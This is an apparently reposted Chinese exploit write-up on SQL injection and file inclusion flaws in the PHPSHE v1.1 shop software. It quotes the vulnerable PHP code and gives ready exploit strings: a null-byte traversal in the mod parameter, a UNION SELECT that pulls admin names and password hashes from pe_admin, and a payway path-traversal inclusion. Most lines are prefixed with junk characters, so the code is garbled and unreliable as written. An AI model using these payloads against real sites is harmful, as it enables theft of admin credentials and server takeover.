phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
( a- W) ?8 Y2 Z/* Phpshe v1.1 Vulnerability
/* ========================
% m6 J  c) o. I$ ?" ]1 |: L$ S/* By: : Kn1f3
/* E-Mail : 681796@qq.com
- l6 C: k5 T, _- H/*******************************************************/
0×00 整体大概参数传输


: Y5 U. }4 U, j
1 d  u/ _$ q$ p8 B0 u+ L, V//common.php
8 N8 K1 q! [. W: L/ tif (get_magic_quotes_gpc()) {
7 K  a$ F7 ~3 k/ L/ h9 e8 E* H# |!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
. y  P2 \) W) R& felse {
. M! p& l" ]5 D) A& H!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
; F$ S! H( Z2 P% b. _. Z}
2 D. J/ h6 e6 e$ ^5 D1 O; G. hsession_start();
8 {. M7 r3 \$ @5 ^' [6 d: U!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
2 z. D4 z) F( Z7 f0 j* u% D
0×01 包含漏洞


* K* N- n2 o5 f- o' k/ Z//首页文件
) E/ i% [* Z- i* q<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
2 [; ^+ O) n4 ^8 {" U" `5 |include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
pe_result();
& ?* p0 A# A/ n/ i( a# _?>
4 n7 b4 U# V. U//common 文件 第15行开始
. x. Z% b. b; h2 o4 [) j4 N# burl路由配置
* {- |) f& Y! W* v/ j$ s5 v  K$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
8 @: p4 t1 r: K9 h) _0 Y0 |/ {$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
  y; A! \8 B2 b( X

0×02 搜索注入

<code id="code2">

//product.php文件
# ~, D. A5 |$ u6 u7 b' Ocase 'list':
$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
//搜索
$sqlwhere = " and `product_state` = 1";
pe_lead('hook/category.hook.php');
! u( @: ]% K9 d" v8 A, J% _( gif ($category_id) {
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
$ \* t% J/ D5 @6 g3 w}
! w) |3 H1 u7 F6 [6 P% u$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
$ N) V$ O4 X- g/ E' [if ($_g_orderby) {
$orderby = explode('_', $_g_orderby);
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
6 J* [, P6 M' `! y; w}
else {
$sqlwhere .= " order by `product_id` desc";
& E' S0 g) K5 n! ?}
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
//热卖排行
4 D# M2 R! Y$ y0 [9 ]9 [) B$product_hotlist = product_hotlist();
0 b0 C5 y2 r& Q//当前路径
2 n' P5 k4 y9 L7 |: s- z9 E- e$nowpath = category_path($category_id);
, @, F' H# D0 I& b/ J6 G/ c# f$seo = pe_seo($info['category_name']);
include(pe_tpl('product_list.html'));
$ d5 p! i4 _7 {! k; ~2 S) c//跟进selectall函数库
+ I& e+ U: Y/ J8 h; wpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
+ w' _( q6 C2 j{
//处理条件语句
5 t6 }  N1 e+ |; c+ v) Q$sqlwhere = $this->_dowhere($where);
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
1 z0 g, t. s$ _& X}
% K7 {5 h' [" S* w$ X8 ~7 r& @( d//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
& e+ x  H& n9 \7 ]$ c2 i

</code>
$ b5 ]( D& o$ K: r
6 p* W5 Q0 M6 a3 {0×03 包含漏洞2
) C. {& k& x' Z4 |5 V9 T7 {. d% n
<code id="code3">

//order.php

case 'pay':

$order_id = pe_dbhold($_g_id);

$cache_payway = cache::get('payway');

* E5 a) B- ^! g$ d; fforeach($cache_payway as $k => $v) {

$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

if ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

}

! h5 A) }) f+ v; l}

5 G: F+ ~" N1 X) G/ b, h* h$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

1 H/ @2 ^3 z4 A9 t0 g3 }!$order['order_id'] && pe_error('订单号错误...');

7 Z- y0 Y6 k# U* Q0 Hif (isset($_p_pesubmit)) {

if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

( [, ~) K+ @( J/ x3 }$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

0 @+ z4 }1 N" Aforeach ($info_list as $v) {

$order['order_name'] .= "{$v['product_name']};";
% d! m  H* e7 w, O

0 |9 o1 m+ w& O  \8 u# s}

+ T0 l: L" O8 C3 T. t" Pecho '正在为您连接支付网站，请稍后...';

/ N8 u3 ^' |* E  T/ kinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

2 E' k8 G  F5 c# h6 E}//当一切准备好的时候就可以进行"鸡肋包含了"

else {

pe_error('支付错误...');

) ]; B0 x, `$ `+ h* j8 A# m}

}

0 k+ f+ ^- w! J0 c1 _$ x$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

break;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
/ e1 I  E; x$ q( L& e! ihttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg